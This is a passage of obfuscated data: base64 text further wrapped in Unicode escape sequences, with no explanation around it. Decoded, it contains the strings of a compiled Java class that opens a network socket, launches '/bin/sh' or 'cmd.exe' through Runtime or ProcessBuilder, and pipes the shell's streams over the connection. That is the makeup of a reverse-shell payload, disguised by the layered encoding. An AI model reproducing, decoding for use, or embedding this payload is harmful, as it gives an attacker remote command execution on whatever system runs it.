u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u0067\u0077\u0042\u0063\u0067\u0046\u007a\u0041\u0051\u0041\u0046\u0049\u0043\u0031\u0075\u0049\u0044\u0051\u0042\u0041\u0041\u0049\u0076\u0059\u0077\u0045\u0041\u0042\u0053\u0041\u0074\u0064\u0043\u0041\u0030\u0041\u0051\u0041\u0043\u0063\u0032\u0067\u0042\u0041\u0041\u0049\u0074\u0059\u0077\u0063\u0042\u0064\u0041\u0077\u0042\u0064\u0051\u0046\u0032\u0044\u0041\u0043\u0066\u0041\u0058\u0063\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0033\u0056\u0030\u0061\u0057\u0077\u0076\u0055\u0032\u004e\u0068\u0062\u006d\u0035\u006c\u0063\u0067\u0063\u0042\u0065\u0041\u0077\u0042\u0065\u0051\u0046\u0036\u0044\u0041\u0043\u0052\u0041\u0058\u0073\u0042\u0041\u0041\u004a\u0063\u0059\u0051\u0077\u0042\u0066\u0041\u0046\u0039\u0044\u0041\u0046\u0048\u0041\u0054\u0034\u004d\u0041\u0058\u0034\u0042\u0065\u0067\u0077\u0042\u0066\u0077\u0043\u0053\u0041\u0051\u0041\u0048\u004c\u0032\u004a\u0070\u0062\u0069\u0039\u007a\u0061\u0041\u0045\u0041\u0042\u0032\u004e\u0074\u005a\u0043\u0035\u006c\u0065\u0047\u0055\u004d\u0041\u004a\u0038\u0042\u0067\u0041\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u006d\u0056\u0030\u004c\u0031\u004e\u0076\u0059\u0032\u0074\u006c\u0064\u0041\u0077\u0041\u006b\u0051\u0043\u0068\u0044\u0041\u0047\u0042\u0041\u0059\u0049\u004d\u0041\u0059\u004d\u0042\u0052\u0067\u0063\u0042\u0068\u0041\u0077\u0042\u0068\u0051\u0047\u0047\u0044\u0041\u0047\u0048\u0041\u0059\u0059\u0048\u0041\u0059\u0067\u004d\u0041\u004a\u0077\u0042\u0069\u0051\u0077\u0042\u0069\u0067\u0047\u004c\u0044\u0041\u0047\u004d\u0041\u0059\u0059\u004d\u0041\u0059\u0030\u0042\u0050\u0067\u0077\u0042\u006a\u0067\u0047\u0047\u0044\u0041\u0043\u0067\u0041\u004b\u0045\u0042\u0041\u0042\u005a\u007a\u0064\u0057\u0034\u0075\u0062\u0057\u006c\u007a\u0059\u0079\u0035\u0043\u0051\u0056\u004e\u0046\u004e\u006a\u0052\u0045\u005a\u0057\u004e\u0076\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u004d\u005a\u0047\u0056\u006a\u0062\u0032\u0052\u006c\u0051\u006e\u0056\u006d\u005a\u006d\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0031\u0064\u0047\u006c\u0073\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0052\u006c\u0059\u0032\u0039\u006b\u005a\u0058\u0049\u0042\u0041\u0043\u005a\u0076\u0063\u006d\u0063\u0075\u0059\u0058\u0042\u0068\u0059\u0032\u0068\u006c\u004c\u006d\u004e\u0076\u0062\u0057\u0031\u0076\u0062\u006e\u004d\u0075\u0059\u0032\u0039\u006b\u005a\u0057\u004d\u0075\u0059\u006d\u006c\u0075\u0059\u0058\u004a\u0035\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0041\u006b\u0045\u0030\u0041\u0051\u0041\u004e\u0059\u0033\u0056\u0079\u0063\u006d\u0056\u0075\u0064\u0046\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0043\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0042\u0041\u0042\u006b\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0042\u0041\u0042\u004d\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0051\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u0047\u0061\u0057\u0056\u0073\u005a\u0041\u0045\u0041\u004c\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u004f\u0077\u0045\u0041\u0046\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u0041\u0051\u0041\u004e\u0063\u0032\u0056\u0030\u0051\u0057\u004e\u006a\u005a\u0058\u004e\u007a\u0061\u0057\u004a\u0073\u005a\u0051\u0045\u0041\u0042\u0043\u0068\u0061\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u006e\u005a\u0058\u0051\u0042\u0041\u0043\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0077\u0045\u0041\u0042\u0032\u0064\u006c\u0064\u0045\u0035\u0068\u0062\u0057\u0055\u0042\u0041\u0042\u0051\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u0047\u004e\u0076\u0062\u006e\u0052\u0068\u0061\u0057\u0035\u007a\u0041\u0051\u0041\u0062\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0068\u0068\u0063\u006c\u004e\u006c\u0063\u0058\u0056\u006c\u0062\u006d\u004e\u006c\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u004e\u005a\u0032\u0056\u0030\u0055\u0033\u0056\u0077\u005a\u0058\u004a\u006a\u0062\u0047\u0046\u007a\u0063\u0077\u0045\u0041\u0043\u0047\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u0041\u0051\u0041\u0057\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u004f\u0077\u0045\u0041\u0045\u006d\u0070\u0068\u0064\u006d\u0045\u0076\u0064\u0058\u0052\u0070\u0062\u0043\u0039\u004a\u0064\u0047\u0056\u0079\u0059\u0058\u0052\u0076\u0063\u0067\u0045\u0041\u0042\u0032\u0068\u0068\u0063\u0030\u0035\u006c\u0065\u0048\u0051\u0042\u0041\u0041\u004d\u006f\u004b\u0056\u006f\u0042\u0041\u0041\u0052\u0075\u005a\u0058\u0068\u0030\u0041\u0051\u0041\u0055\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0042\u0041\u0041\u006c\u006e\u005a\u0058\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0045\u0041\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0063\u006d\u0056\u006d\u0062\u0047\u0056\u006a\u0064\u0043\u0039\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0037\u0041\u0051\u0041\u0059\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0033\u004a\u006c\u005a\u006d\u0078\u006c\u0059\u0033\u0051\u0076\u0054\u0057\u0056\u0030\u0061\u0047\u0039\u006b\u0041\u0051\u0041\u0047\u0061\u0057\u0035\u0032\u0062\u0032\u0074\u006c\u0041\u0051\u0041\u0035\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0031\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u006e\u006c\u0030\u005a\u0058\u004d\u0042\u0041\u0041\u0051\u006f\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u006c\u0075\u0064\u0047\u0056\u006e\u005a\u0058\u0049\u0042\u0041\u0041\u0052\u0055\u0057\u0056\u0042\u0046\u0041\u0051\u0041\u0052\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0073\u0042\u0041\u0041\u0064\u0032\u0059\u0057\u0078\u0031\u005a\u0055\u0039\u006d\u0041\u0051\u0041\u0057\u004b\u0045\u006b\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0043\u0032\u0035\u006c\u0064\u0030\u006c\u0075\u0063\u0033\u0052\u0068\u0062\u006d\u004e\u006c\u0041\u0051\u0041\u0052\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0041\u0064\u006d\u0062\u0033\u004a\u004f\u0059\u0057\u0031\u006c\u0041\u0051\u0041\u0056\u005a\u0032\u0056\u0030\u0051\u0032\u0039\u0075\u0064\u0047\u0056\u0034\u0064\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u005a\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u004f\u0077\u0045\u0041\u0046\u0057\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0078\u0076\u0059\u0057\u0052\u006c\u0063\u0067\u0045\u0041\u0042\u006d\u0056\u0078\u0064\u0057\u0046\u0073\u0063\u0077\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0057\u0067\u0045\u0041\u0042\u0048\u0052\u0079\u0061\u0057\u0030\u0042\u0041\u0041\u0070\u007a\u0064\u0047\u0046\u0079\u0064\u0048\u004e\u0058\u0061\u0058\u0052\u006f\u0041\u0051\u0041\u0056\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u0046\u0063\u0033\u0042\u0073\u0061\u0058\u0051\u0042\u0041\u0043\u0063\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0068\u0077\u0059\u0058\u004a\u007a\u005a\u0055\u006c\u0075\u0064\u0041\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0053\u0051\u0045\u0041\u0046\u0079\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004a\u0031\u0062\u006d\u0035\u0068\u0059\u006d\u0078\u006c\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u0046\u0063\u0033\u0052\u0068\u0063\u006e\u0051\u0042\u0041\u0042\u0055\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0059\u0042\u0041\u0042\u0045\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0052\u006d\u006c\u0073\u005a\u0054\u0073\u0070\u0056\u0067\u0045\u0041\u0042\u0053\u0068\u0062\u0051\u0069\u006c\u0057\u0041\u0051\u0041\u0046\u005a\u006d\u0078\u0031\u0063\u0032\u0067\u0042\u0041\u0041\u0056\u006a\u0062\u0047\u0039\u007a\u005a\u0051\u0045\u0041\u0043\u0048\u0052\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0051\u0057\u004a\u007a\u0062\u0032\u0078\u0031\u0064\u0047\u0056\u0051\u0059\u0058\u0052\u006f\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0077\u0062\u0047\u0046\u006a\u005a\u0051\u0045\u0041\u0052\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0035\u0063\u0033\u0052\u006c\u0062\u0051\u0045\u0041\u0043\u0032\u0064\u006c\u0064\u0046\u0042\u0079\u0062\u0033\u0042\u006c\u0063\u006e\u0052\u0035\u0041\u0051\u0041\u004c\u0064\u0047\u0039\u004d\u0062\u0033\u0064\u006c\u0063\u006b\u004e\u0068\u0063\u0032\u0055\u0042\u0041\u0041\u005a\u0068\u0063\u0048\u0042\u006c\u0062\u006d\u0051\u0042\u0041\u0043\u0030\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u006a\u0073\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0046\u004a\u0031\u0062\u006e\u0052\u0070\u0062\u0057\u0055\u0042\u0041\u0042\u0055\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0054\u0073\u0042\u0041\u0043\u0067\u006f\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0042\u0041\u0041\u0035\u006e\u005a\u0058\u0052\u004a\u0062\u006e\u0042\u0031\u0064\u0046\u004e\u0030\u0063\u006d\u0056\u0068\u0062\u0051\u0045\u0041\u0046\u0079\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0053\u0057\u0035\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0059\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u004d\u0064\u0058\u004e\u006c\u0052\u0047\u0056\u0073\u0061\u0057\u0031\u0070\u0064\u0047\u0056\u0079\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0031\u004e\u006a\u0059\u0057\u0035\u0075\u005a\u0058\u0049\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0052\u0058\u004a\u0079\u0062\u0033\u004a\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0042\u0041\u0041\u0064\u006b\u005a\u0058\u004e\u0030\u0063\u006d\u0039\u0035\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0059\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0049\u0061\u0058\u004e\u0044\u0062\u0047\u0039\u007a\u005a\u0057\u0051\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u004a\u0059\u0058\u005a\u0068\u0061\u0057\u0078\u0068\u0059\u006d\u0078\u006c\u0041\u0051\u0041\u0044\u004b\u0043\u006c\u004a\u0041\u0051\u0041\u0045\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u0041\u0051\u0041\u0045\u004b\u0045\u006b\u0070\u0056\u0067\u0045\u0041\u0042\u0058\u004e\u0073\u005a\u0057\u0056\u0077\u0041\u0051\u0041\u0045\u004b\u0045\u006f\u0070\u0056\u0067\u0045\u0041\u0043\u0057\u0056\u0034\u0061\u0058\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0031\u006c\u0063\u0033\u004e\u0068\u005a\u0032\u0055\u0042\u0041\u0041\u0068\u0070\u0062\u006e\u0052\u0057\u0059\u0057\u0078\u0031\u005a\u0051\u0041\u0068\u0041\u0049\u0077\u0041\u0048\u0067\u0041\u0042\u0041\u0041\u0038\u0041\u0041\u0067\u0041\u0043\u0041\u0049\u0030\u0041\u006a\u0067\u0041\u0041\u0041\u0041\u0049\u0041\u006a\u0077\u0043\u0051\u0041\u0041\u0041\u0041\u0043\u0051\u0041\u0042\u0041\u004a\u0045\u0041\u006b\u0067\u0041\u0043\u0041\u004a\u004d\u0041\u0041\u0041\u004f\u0032\u0041\u0041\u0059\u0041\u0045\u0077\u0041\u0041\u0041\u006f\u0034\u0071\u0074\u0077\u0041\u0042\u0075\u0041\u0041\u0043\u0074\u0067\u0041\u0044\u0054\u0043\u0075\u0032\u0041\u0041\u0051\u0053\u0042\u0062\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u0072\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u004a\u0077\u0041\u0041\u004a\u0054\u0069\u0030\u0036\u0042\u0042\u006b\u0045\u0076\u006a\u0059\u0046\u0041\u007a\u0059\u0047\u0046\u0051\u0059\u0056\u0042\u0061\u0049\u0043\u0057\u0042\u006b\u0045\u0046\u0051\u0059\u0079\u004f\u0067\u0063\u005a\u0042\u0038\u0063\u0041\u0042\u0071\u0063\u0043\u0051\u0078\u006b\u0048\u0074\u0067\u0041\u004b\u004f\u0067\u0067\u005a\u0043\u0042\u0049\u004c\u0074\u0067\u0041\u004d\u006d\u0067\u0041\u004e\u0047\u0051\u0067\u0053\u0044\u0062\u0059\u0041\u0044\u004a\u006f\u0041\u0042\u0071\u0063\u0043\u004a\u0052\u006b\u0048\u0074\u0067\u0041\u0045\u0045\u0067\u0036\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u0065\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0077\u0051\u0041\u0050\u006d\u0067\u0041\u0047\u0070\u0077\u0049\u0043\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u004c\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0043\u0062\u0059\u0041\u0043\u0044\u006f\u004a\u0047\u0051\u006d\u0032\u0041\u0041\u0051\u0053\u0045\u0062\u0059\u0041\u0042\u006b\u0032\u006e\u0041\u0042\u0059\u0036\u0043\u0068\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0074\u0067\u0041\u0054\u0045\u0068\u0047\u0032\u0041\u0041\u005a\u004e\u004c\u0041\u0053\u0032\u0041\u0041\u0063\u0073\u0047\u0051\u006d\u0032\u0041\u0041\u0067\u0036\u0043\u0052\u006b\u004a\u0074\u0067\u0041\u0045\u0074\u0067\u0041\u0054\u0045\u0068\u0053\u0032\u0041\u0041\u005a\u004e\u0070\u0077\u0041\u0051\u004f\u0067\u006f\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0055\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u004f\u0067\u006b\u005a\u0043\u0062\u0059\u0041\u0042\u0042\u0049\u0056\u0074\u0067\u0041\u0047\u0054\u0053\u0077\u0045\u0074\u0067\u0041\u0048\u004c\u0042\u006b\u004a\u0074\u0067\u0041\u0049\u0077\u0041\u0041\u0057\u0077\u0041\u0041\u0057\u004f\u0067\u006f\u005a\u0043\u0072\u006b\u0041\u0046\u0077\u0045\u0041\u004f\u0067\u0073\u005a\u0043\u0037\u006b\u0041\u0047\u0041\u0045\u0041\u006d\u0051\u0046\u0062\u0047\u0051\u0075\u0035\u0041\u0042\u006b\u0042\u0041\u0044\u006f\u004d\u0047\u0051\u0079\u0032\u0041\u0041\u0051\u0053\u0047\u0072\u0059\u0041\u0042\u006b\u0030\u0073\u0042\u004c\u0059\u0041\u0042\u0079\u0077\u005a\u0044\u004c\u0059\u0041\u0043\u0044\u006f\u004e\u0047\u0051\u0032\u0032\u0041\u0041\u0051\u0053\u0047\u0077\u004f\u0039\u0041\u0042\u0079\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u004f\u0039\u0041\u0042\u0036\u0032\u0041\u0042\u0038\u0036\u0044\u0068\u006b\u004e\u0074\u0067\u0041\u0045\u0045\u0069\u0041\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u0049\u0056\u004f\u0032\u0041\u0042\u0030\u005a\u0044\u0051\u0053\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u0049\u0069\u0055\u0037\u0059\u0041\u0048\u0038\u0041\u0041\u0049\u0054\u006f\u0050\u0047\u0051\u002f\u0048\u0041\u0041\u0061\u006e\u002f\u0035\u0045\u0071\u0047\u0051\u002b\u0032\u0041\u0043\u004f\u0032\u0041\u0043\u0051\u0036\u0045\u0042\u006b\u004f\u0074\u0067\u0041\u0045\u0045\u0069\u0055\u0045\u0076\u0051\u0041\u0063\u0057\u0051\u004f\u0079\u0041\u0043\u005a\u0054\u0074\u0067\u0041\u0064\u0047\u0051\u0034\u0045\u0076\u0051\u0041\u0065\u0057\u0051\u004d\u0052\u0041\u004d\u0069\u0034\u0041\u0043\u0064\u0054\u0074\u0067\u0041\u0066\u0056\u0079\u006f\u0053\u004b\u004c\u0059\u0041\u004b\u0054\u006f\u0052\u0047\u0052\u0047\u0032\u0041\u0043\u006f\u0036\u0043\u0052\u006b\u0052\u0045\u0069\u0073\u0047\u0076\u0051\u0041\u0063\u0057\u0051\u004d\u0053\u004c\u0046\u004e\u005a\u0042\u004c\u0049\u0041\u004a\u006c\u004e\u005a\u0042\u0062\u0049\u0041\u004a\u006c\u004f\u0032\u0041\u0043\u0030\u005a\u0043\u0051\u0061\u0039\u0041\u0042\u0035\u005a\u0041\u0078\u006b\u0051\u0055\u0031\u006b\u0045\u0041\u0037\u0067\u0041\u004a\u0031\u004e\u005a\u0042\u0052\u006b\u0051\u0076\u0072\u0067\u0041\u004a\u0031\u004f\u0032\u0041\u0042\u0039\u0058\u0047\u0051\u0036\u0032\u0041\u0041\u0051\u0053\u004c\u0067\u0053\u0039\u0041\u0042\u0078\u005a\u0041\u0078\u006b\u0052\u0055\u0037\u0059\u0041\u0048\u0052\u006b\u004f\u0042\u004c\u0030\u0041\u0048\u006c\u006b\u0044\u0047\u0051\u006c\u0054\u0074\u0067\u0041\u0066\u0056\u0036\u0063\u0041\u0054\u007a\u006f\u0052\u004b\u0068\u0049\u0077\u0074\